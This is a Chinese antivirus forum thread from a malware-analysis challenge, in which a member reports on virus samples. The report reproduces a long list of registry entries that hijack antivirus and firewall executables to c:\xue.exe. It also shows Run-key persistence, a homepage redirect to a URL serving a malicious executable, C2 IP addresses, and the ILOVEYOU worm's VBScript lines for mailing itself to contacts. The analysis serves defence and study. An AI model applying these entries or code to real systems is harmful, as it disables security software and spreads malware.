[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVKSERV.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVNT.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPCC.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPDOS32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPM.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPTC32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVPUPD.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVSCHED32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWIN95.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWUPD32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKD.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BLACKICE.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIADMIN.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFIAUDIT.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFINET.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CFINET32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLAW95CF.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CLEANER3.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DVP95.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DVP95_0.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ECENGINE.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EGHOST.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ESAFE.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EXPWATCH.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-AGNT95.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-PROT.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-PROT95.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\F-STOPW.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FESCUE.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FINDVIRU.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FP-WIN.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FPROT.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FRW.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMAPP.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IAMSERV.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMASN.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IBMAVSP.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOAD95.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICLOADNT.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICMON.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICSUPP95.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ICSUPPNT.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IFACE.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IOMON98.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmor.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JEDI.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFW.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVsvc.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSvcUI.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVFW.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP.kxp] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXP.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVwsc.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP.kxp] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchUI.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LOCKDOWN2000.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Logo1_.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Logo_1.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LOOKOUT.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LUALL.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MAILMON.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MOOLIVE.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MPFTRAY.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\N32SCANW.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Navapsvc.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Navapw32.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVLU32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVNT.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\navw32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVWNT.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NISUM.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NMain.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NORMIST.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NUPGRADE.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NVC95.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PAVCL.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PAVSCHED.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PAVW.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCCWIN98.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCFWALLICON.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PERSFW.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFW.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rav.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAV7.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAV7WIN.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAVmon.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAVmonD.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RAVtimer.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rising.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SAFEWEB.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCAN32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCAN95.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCANPM.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SCRSCAN.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SERV95.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SMC.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SPHINX.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SWEEP95.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TBSCAN.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TCA.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TDS2-98.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TDS2-NT.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\THGUARD.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanHunter.exe] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VET95.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VETTRAY.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VSCAN40.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VSECOMR.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VSHWIN32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\VSSTAT.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WEBSCANX.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WFINDV32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ZONEALARM.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_AVP32.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_AVPCC.EXE] "Debugger"="c:\\\\xue.exe" [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_AVPM.EXE] "Debugger"="c:\\\\xue.exe" 其他行为: 搜索感染除系统盘以外的所有 .exe 文件, 不过好像一些安全文件也没感染, 在我硬盘里只有部分感染运行被感染的文件时,生成 xue.xue 运行, 运行的软件报错病毒联网: 222.84.225.165 和 208.68.139.89 麦青儿最后编辑于 2010-04-06 10:29:04
mopery 卡卡技术团队帖子:17737 注册: 2005-12-06 来自:New York

mopery 卡卡技术团队帖子:17737 注册: 2005-12-06 来自:New York	发表于： 2010-03-28 15:50 \| 只看楼主短消息资料字号：小中大 4楼回复: [Simple Lions]第四关闯关病毒样本3 文件变化: 释放文件 C:\WINDOWS\Win32DLL.vbs C:\WINDOWS\system32\LOVE-LETTER-FOR-YOU.HTM C:\WINDOWS\system32\LOVE-LETTER-FOR-YOU.TXT.vbs C:\WINDOWS\system32\MSKernel32.vbs 注册表变动: 病毒创建启动项 [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "MSKernel32"="C:\WINDOWS\system32\MSKernel32.vbs" [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices] "Win32DLL"="C:\WINDOWS\Win32DLL.vbs" 病毒修改项 [HKCU\Software\Microsoft\Internet Explorer\Main] "Start Page"="http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe" 其他行为: 病毒扫描硬盘内的所有 "vbs" "vbe" "js" "jse" "css" "wsh" "sct" "hta" "jpg" "jpeg" "mp3" "mp2" 格式文件替换为与原文件同名的病毒副本当病毒监测到 outlook 程序,就会给 outlook 里的所有联系人发送一封带有病毒的e-mail male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") 说明: 由于病毒的较早前的, 所以有些行为无法复现麦青儿最后编辑于 2010-04-06 10:30:15
mopery 卡卡技术团队帖子:17737 注册: 2005-12-06 来自:New York

mopery 卡卡技术团队帖子:17737 注册: 2005-12-06 来自:New York	发表于： 2010-03-28 15:55 \| 只看楼主短消息资料字号：小中大 5楼回复: [Simple Lions]第四关闯关附件为截图附件: 文件名:截图.rar 下载次数:869 文件类型:application/octet-stream 文件大小: 上传时间:2010-3-28 15:54:45 描述:rar 麦青儿最后编辑于 2010-04-06 13:21:05
mopery 卡卡技术团队帖子:17737 注册: 2005-12-06 来自:New York

baohe 大版主帖子:72578 注册: 2003-04-10 来自:	发表于： 2010-03-28 16:06 \| 短消息资料字号：小中大 6楼回复：[Simple Lions]第四关闯关不错！赞一个！
baohe 大版主帖子:72578 注册: 2003-04-10 来自:

networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:	发表于： 2010-03-29 10:53 \| 短消息资料字号：小中大 7楼回复：[Simple Lions]第四关闯关高手膜拜一下
networkedition 社区嘉宾帖子:36698 注册: 2008-02-28 来自:

mopery 卡卡技术团队帖子:17737 注册: 2005-12-06 来自:New York	发表于： 2010-03-29 10:59 \| 只看楼主短消息资料字号：小中大 8楼回复: [Simple Lions]第四关闯关引用: 原帖由 networkedition 于 2010-3-29 10:53:00 发表高手膜拜一下你就使劲欺负我吧... -.-
mopery 卡卡技术团队帖子:17737 注册: 2005-12-06 来自:New York

最硬的石头版主帖子:4140 注册: 2008-07-24 来自:	发表于： 2010-04-01 17:18 \| 短消息资料字号：小中大 9楼回复：[Simple Lions]第四关闯关看看
最硬的石头版主帖子:4140 注册: 2008-07-24 来自:

是昔流芳卡卡反病毒小组帖子:646 注册: 2009-05-10 来自:青鸾峰	发表于： 2010-04-05 20:25 \| 短消息资料字号：小中大 10楼回复：[Simple Lions]第四关闯关来此围观 My Blog
是昔流芳卡卡反病毒小组帖子:646 注册: 2009-05-10 来自:青鸾峰

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT